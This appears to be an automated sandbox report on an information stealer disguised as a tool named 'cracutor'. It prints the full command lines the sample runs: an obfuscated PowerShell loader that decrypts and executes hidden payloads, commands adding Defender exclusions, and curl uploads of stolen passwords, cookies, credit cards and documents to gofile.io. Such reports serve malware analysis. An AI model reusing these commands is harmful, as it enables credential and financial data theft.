Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2492 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 2576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 1884 wrote to memory of 2576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 1884 wrote to memory of 2576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 1884 wrote to memory of 1704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 1704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 4648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 4648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 4056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 4056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 2172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 2172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 3792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe
PID 1884 wrote to memory of 3792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe
PID 3792 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe
PID 3792 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe
PID 1908 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 3672 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3672 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1908 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 4608 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4608 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 4284 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4284 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 3628 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3628 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 4352 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4352 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 2364 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2364 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 4464 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4464 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2536 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2536 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zFCOPqZUpxhO5ciHbZM4ROMYeYlSpVgI4g7jD8zHAUY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vDZO0S7Am6YBYCRTxFXCyQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zAiLC=New-Object System.IO.MemoryStream(,$param_var); $YmoSv=New-Object System.IO.MemoryStream; $vqshj=New-Object System.IO.Compression.GZipStream($zAiLC, [IO.Compression.CompressionMode]::Decompress); $vqshj.CopyTo($YmoSv); $vqshj.Dispose(); $zAiLC.Dispose(); $YmoSv.Dispose(); $YmoSv.ToArray();}function execute_function($param_var,$param2_var){ $qmwRL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dQiwA=$qmwRL.EntryPoint; $dQiwA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat';$kqgmW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat').Split([Environment]::NewLine);foreach ($RIPei in $kqgmW) { if ($RIPei.StartsWith(':: ')) { $flwkS=$RIPei.Substring(3); break; }}$payloads_var=[string[]]$flwkS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'

C:\Users\Admin\AppData\Local\Temp\klxcnl.exe

"C:\Users\Admin\AppData\Local\Temp\klxcnl.exe"

C:\Users\Admin\AppData\Local\Temp\klxcnl.exe

"C:\Users\Admin\AppData\Local\Temp\klxcnl.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/ResetBackup.potm" https://store10.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ExpandBackup.pptm" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/ResetBackup.potm" https://store10.gofile.io/uploadFile

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Documents/ExpandBackup.pptm" https://store10.gofile.io/uploadFile

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 scriptblox.com udp
US 172.67.68.166:443 scriptblox.com tcp
US 8.8.8.8:53 166.68.67.172.in-addr.arpa udp
US 8.8.8.8:53 publisher-misc.gl.at.ply.gg udp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 8.8.8.8:53 17.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.38.43.18:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 store10.gofile.io udp
FR 31.14.70.252:443 store10.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 252.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/1884-0-0x00007FFE302C3000-0x00007FFE302C5000-memory.dmp

memory/1884-1-0x00000171AF710000-0x00000171AF732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mk0v5gc0.q5a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1884-11-0x00007FFE302C0000-0x00007FFE30D81000-memory.dmp

memory/1884-12-0x00007FFE302C0000-0x00007FFE30D81000-memory.dmp

memory/1884-13-0x00000171AF900000-0x00000171AF908000-memory.dmp

memory/1884-14-0x00000171D1E50000-0x00000171D2058000-memory.dmp

memory/1884-17-0x00000171AF910000-0x00000171AF924000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

MD5 03d0c69e31fd77718e661722361c0a5c
SHA1 04e02539771963a628477f6546be48d2d912a612
SHA256 255834540df95d84167a197acc6e70d9b80baa5dc15ddb16060508be498f1e78
SHA512 94ed7ee2ad72a4b80fc9121483c5b95ad2a1036b3a20f60499d59cc1255635bcade467952b828a3b27415ddd799c8b3a89476bc0f34726292f6632249fa0d986

memory/2576-28-0x00000000750EE000-0x00000000750EF000-memory.dmp

memory/2576-29-0x00000000007B0000-0x00000000009AE000-memory.dmp

memory/2576-30-0x00000000750E0000-0x0000000075890000-memory.dmp

memory/2576-31-0x0000000005A70000-0x0000000006014000-memory.dmp

memory/2576-32-0x0000000005560000-0x00000000055FE000-memory.dmp

memory/2576-33-0x0000000006020000-0x00000000060B2000-memory.dmp

memory/2576-34-0x00000000750E0000-0x0000000075890000-memory.dmp

memory/2576-35-0x00000000059B0000-0x00000000059B8000-memory.dmp

memory/2576-36-0x0000000005A00000-0x0000000005A38000-memory.dmp

memory/2576-37-0x00000000059D0000-0x00000000059DE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 62623d22bd9e037191765d5083ce16a3
SHA1 4a07da6872672f715a4780513d95ed8ddeefd259
SHA256 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA512 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e3161f4edbc9b963debe22e29658050b
SHA1 45dbf88dadafe5dd1cfee1e987c8a219d3208cdb
SHA256 1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a
SHA512 006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 83685d101174171875b4a603a6c2a35c
SHA1 37be24f7c4525e17fa18dbd004186be3a9209017
SHA256 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

memory/1884-90-0x00007FFE302C3000-0x00007FFE302C5000-memory.dmp

memory/1884-91-0x00007FFE302C0000-0x00007FFE30D81000-memory.dmp

memory/1884-92-0x00007FFE302C0000-0x00007FFE30D81000-memory.dmp

memory/2576-93-0x00000000750EE000-0x00000000750EF000-memory.dmp

memory/2576-94-0x00000000750E0000-0x0000000075890000-memory.dmp

memory/1884-95-0x00000171AF8C0000-0x00000171AF8CE000-memory.dmp

memory/1884-97-0x00000171DA5A0000-0x00000171DA6C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\klxcnl.exe

MD5 5076e1777bdc18710ed70c27b96a95db
SHA1 cb24ad63bd9598bccf46e64b576144b2e5be7d53
SHA256 73d2131cdc04f4751f9c6911607a76192bd5e440ec597291cba1acb1aba8f201
SHA512 8d931a5dc1e4cfd7e0876e6f35ba8a2756a44957f746b3c996d6753f089ef127557e483ff434aa2861ae12071a4a68c3eafcacd5930e5f1234fb91831cc67de9

C:\Users\Admin\AppData\Local\Temp\_MEI37922\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

C:\Users\Admin\AppData\Local\Temp\_MEI37922\VCRUNTIME140.dll

MD5 11d9ac94e8cb17bd23dea89f8e757f18
SHA1 d4fb80a512486821ad320c4fd67abcae63005158
SHA256 e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e
SHA512 aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

C:\Users\Admin\AppData\Local\Temp\_MEI37922\base_library.zip

MD5 e390f6f8210ec8f625e41d032892a555
SHA1 1942cd3974970e436f51d08284d216af91bd563f
SHA256 072a34a29da732afb01237adcc33198842edd473d014cf6b7f0ee3285f8b42d4
SHA512 b577eee901ce55fcc63403caa782a6f36dc20c18894508f78cac7d0d03c5ce0771bd4671525d7f0b5a86bf0afe0b09afea38d4e07767a8154ccc8cc27b3a295b

C:\Users\Admin\AppData\Local\Temp\_MEI37922\python3.DLL

MD5 a5471f05fd616b0f8e582211ea470a15
SHA1 cb5f8bf048dc4fc58f80bdfd2e04570dbef4730e
SHA256 8d5e09791b8b251676e16bdd66a7118d88b10b66ad80a87d5897fadbefb91790
SHA512 e87d06778201615b129dcf4e8b4059399128276eb87102b5c3a64b6e92714f6b0d5bde5df4413cc1b66d33a77d7a3912eaa1035f73565dbfd62280d09d46abff

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_bz2.pyd

MD5 b45e82a398713163216984f2feba88f6
SHA1 eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839
SHA256 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8
SHA512 b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_uuid.pyd

MD5 aeead50876ddb63cb8e882989041d7da
SHA1 c9bf23227ced84d39bd33665444de3e9064315c6
SHA256 c74aaeec487457139b47c0ab56e01922bfae6debef562800e5b9b6baf1ec9d6a
SHA512 74c8fe6cfd67e1984a2df9bd998ae363519de16b5840cabba01660154fbeac92e2c773ecc2884d531362e8a0b739673c44f450c1bea05ca33eef58a8e61bc2ca

C:\Users\Admin\AppData\Local\Temp\_MEI37922\select.pyd

MD5 78d421a4e6b06b5561c45b9a5c6f86b1
SHA1 c70747d3f2d26a92a0fe0b353f1d1d01693929ac
SHA256 f1694ce82da997faa89a9d22d469bfc94abb0f2063a69ec9b953bc085c2cb823
SHA512 83e02963c9726a40cd4608b69b4cdf697e41c9eedfb2d48f3c02c91500e212e7e0ab03e6b3f70f42e16e734e572593f27b016b901c8aa75f674b6e0fbb735012

memory/1884-275-0x00000171D1DA0000-0x00000171D1DAC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_socket.pyd

MD5 5dd51579fa9b6a06336854889562bec0
SHA1 99c0ed0a15ed450279b01d95b75c162628c9be1d
SHA256 3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c
SHA512 7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e

memory/1884-272-0x00000171D25A0000-0x00000171D28F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_ssl.pyd

MD5 11c5008e0ba2caa8adf7452f0aaafd1e
SHA1 764b33b749e3da9e716b8a853b63b2f7711fcc7c
SHA256 bf63f44951f14c9d0c890415d013276498d6d59e53811bbe2fa16825710bea14
SHA512 fceb022d8694bce6504d6b64de4596e2b8252fc2427ee66300e37bcff297579cc7d32a8cb8f847408eaa716cb053e20d53e93fbd945e3f60d58214e6a969c9dd

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_sqlite3.pyd

MD5 6486e5c8512bddc5f5606d11fe8f21e0
SHA1 650861b2c4a1d6689ff0a49bb916f8ff278bb387
SHA256 728d21be4d47dd664caf9fa60c1369fe059bc0498edd383b27491d0dee23e439
SHA512 f2c9267a3cab31190079037e3cc5614f19c1235852454708c4978008ea9da345892191750980aebc809cc83dd1f5788b60f8cf39a6a41623210c96af916d1821

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_queue.pyd

MD5 c9ee37e9f3bffd296ade10a27c7e5b50
SHA1 b7eee121b2918b6c0997d4889cff13025af4f676
SHA256 9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a
SHA512 c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_overlapped.pyd

MD5 5bfe7d9e1877fdde718bb84b67d8be68
SHA1 ebc7389ccca80d92d7b891815843e4c7d066cd51
SHA256 fe5666c1c8215cd2773744c815fb4a3b2f52f64cf0dde25d458441da22bf5568
SHA512 9fbf4c77784677957b8ade962cc0730ef6cfa865c14c712fd2a978903596a92e359a5234095b2a23d9e4daf7abb4029cd855b91cba696fde448668ccf4a1efea

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_multiprocessing.pyd

MD5 fce357f864a558c03ed17755f87d0e30
SHA1 b74ecb2bee03a8ff209f52f652c011f28d5ae4d0
SHA256 000486aaac9dd21e88b3dc65fd854dd83519b1fbcc224a70530bc3ec8cbd1a5d
SHA512 564dea2bf3410011a76ca5ea376dba3ec9b2d03fd25248824f6c956fa5ea061c1a9ee6f6b65b021ea5bf9cc5e3ab9c6fcf4779446b920891a2c0979bbc57d58b

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_hashlib.pyd

MD5 cfb9e0a73a6c9d6d35c2594e52e15234
